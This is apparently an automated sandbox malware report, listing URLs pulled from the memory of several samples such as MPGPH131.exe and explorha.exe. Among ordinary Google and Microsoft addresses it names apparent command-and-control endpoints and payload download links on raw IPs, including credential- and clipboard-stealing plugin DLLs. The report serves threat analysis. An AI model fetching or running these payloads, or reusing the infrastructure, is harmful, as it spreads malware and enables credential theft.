Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0YouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0zy1 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.com/fwlink/?linkid=851546-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016pk2016&ui=en-us&rs=en-us&ad=uspk2016&ui=en-us&rs=en-us&ad=usapp%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0aoutube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2734561741.0000000007CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687568679.0000000003DA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube/t equals www.youtube.com (Youtube)
Source: bad48ea9ac.exe, 0000001F.00000003.2813883212.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2810834359.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2808553560.0000000003BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountn equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737384071.0000000007CDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737384071.0000000007CDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.youtube.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
Host: play.google.com
Connection: keep-alive
Content-Length: 931
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-arch: "x86"
Content-Type: text/plain;charset=UTF-8
sec-ch-ua-full-version: "117.0.5938.132"
sec-ch-ua-platform-version: "10.0.0"
X-Goog-AuthUser: 0
sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
sec-ch-ua-bitness: "64"
sec-ch-ua-model: ""
sec-ch-ua-wow64: ?0
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://accounts.google.com
X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://accounts.google.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/8r
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/A2E7B-21CB-41b2-A086-B309680C6B7E
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/SOR_LEVEL=6PROCESSOR_RE
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe0.1
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe192.168.0Yx8
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exexr
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/random.exe
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/random.exel
Source: explorha.exe, 00000006.00000002.2899294419.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.000000000075D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exe
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exe8
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exeP
Source: explorha.exe, 00000006.00000002.2899294419.00000000006B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exeata
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/en-US
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/Plugins/clip64.dll
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/Plugins/cred64.dll
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2668917227.000001DDF136D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.2899487024.000000000061A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.2899487024.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php)
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php/
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php0
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php342a2
Source: rundll32.exe, 0000001A.00000002.2899487024.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php6)
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.php;
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpB
Source: chrosha.exe, 00000010.00000002.2907399446.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpG
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.2899487024.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpP
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpY
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phperWgfTOmIUKDbvTuTS4b2SL=ex.php
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpp
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpq
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/enigma/index.phpv
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exeF
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exeI
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe5
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/xeJ
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/
Source: rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/&
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/015f815db2cd0aea5fb37b3eefba1586aa0e
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/015f815db2cd0aea5fb37b3eefba1586aa0e17e76#da#
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/015f815db2cd0aea5fb37b3eefba1586aa550018
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/33.132.56/015f815db2cd0aea5fb37b3eefba1586aa001
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/33.132.56/015f815db2cd0aea5fb37b3eefba1586aa0e17e76n
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/4e40adc2dc8e2a9e730e8b2e8b2446fe1e928766ada
Source: explorha.exe, 00000006.00000002.2899294419.000000000071B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
Source: rundll32.exe, 00000008.00000002.2527620455.0000022BD71EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.000000000063A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php01
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php51a4f
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php56001
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php8
Source: rundll32.exe, 0000000B.00000002.2900366826.000000000063A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?
Source: rundll32.exe, 00000008.00000002.2527620455.0000022BD71EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2527620455.0000022BD7214000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1b
Source: rundll32.exe, 00000008.00000002.2528087057.0000022BD9090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1es
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpUsers
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpded
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phph
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpoded
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpru
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpv
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpx
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/a
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e171
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e17e001
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e17e76#
Source: explorha.exe, 00000006.00000002.2899294419.00000000006E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/f49fa1f45b59ea9f5e7af18214e40adc2dc8e2a9e730e8b2e8b2446fe1e928766ada#
Source: svchost.exe, 00000012.00000002.2922554035.0000019ECF261000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF44D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E248B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2449781101.0000017E32F5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2625392452.000001CA65298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E23118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E22EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E23118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001D.00000002.2646021051.000001CA6D510000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.?
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDp
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpuTpu
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.goo
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_h
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_s
